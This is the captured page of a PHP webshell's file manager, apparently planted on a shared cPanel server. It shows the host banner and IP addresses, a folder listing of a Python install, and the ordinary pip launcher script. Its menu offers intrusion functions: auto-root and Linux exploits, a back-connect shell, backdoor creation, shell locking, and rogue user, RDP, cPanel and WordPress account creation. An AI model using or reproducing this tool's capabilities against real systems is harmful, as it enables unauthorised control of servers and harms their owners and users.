Linux s3.cpanelhost.co.in 5.14.0-611.49.2.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Apr 30 09:05:08 EDT 2026 x86_64
LiteSpeed
: 65.108.44.247 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
7.4.33
teac11783
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
python313 /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
idle3
108
B
-rwxr-xr-x
idle3.13
108
B
-rwxr-xr-x
lswsgi
114.41
KB
-rwxr-xr-x
msgfmt3.13.py
7.71
KB
-rwxr-xr-x
msgfmt3.py
7.71
KB
-rwxr-xr-x
pathfix.py
5.42
KB
-rwxr-xr-x
pip
662
B
-rwxr-xr-x
pip-3
662
B
-rwxr-xr-x
pip-3.13
662
B
-rwxr-xr-x
pip3
662
B
-rwxr-xr-x
pip3.13
662
B
-rwxr-xr-x
pydoc3
93
B
-rwxr-xr-x
pydoc3.13
93
B
-rwxr-xr-x
pygettext3.13.py
23.88
KB
-rwxr-xr-x
pygettext3.py
23.88
KB
-rwxr-xr-x
python3
14.91
KB
-rwxr-xr-x
python3-config
173
B
-rwxr-xr-x
python3-debug
14.91
KB
-rwxr-xr-x
python3.13
14.91
KB
-rwxr-xr-x
python3.13-config
173
B
-rwxr-xr-x
python3.13-x86_64-config
3.5
KB
-rwxr-xr-x
python3.13d
14.91
KB
-rwxr-xr-x
python3.13d-config
175
B
-rwxr-xr-x
python3.13d-x86_64-config
3.54
KB
-rwxr-xr-x
wheel
965
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pip
#!/opt/alt/python313/bin/python3 # -*- coding: utf-8 -*- import re import sys try: from pip._internal.cli.main import main except ImportError: try: from pip._internal.main import main except ImportError: try: # If the user has downgraded pip, the above import will fail. # Let's try older methods of invoking it: # pip 19 uses this from pip._internal import main except ImportError: # older pip versions use this from pip import main if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0]) sys.exit(main())
Close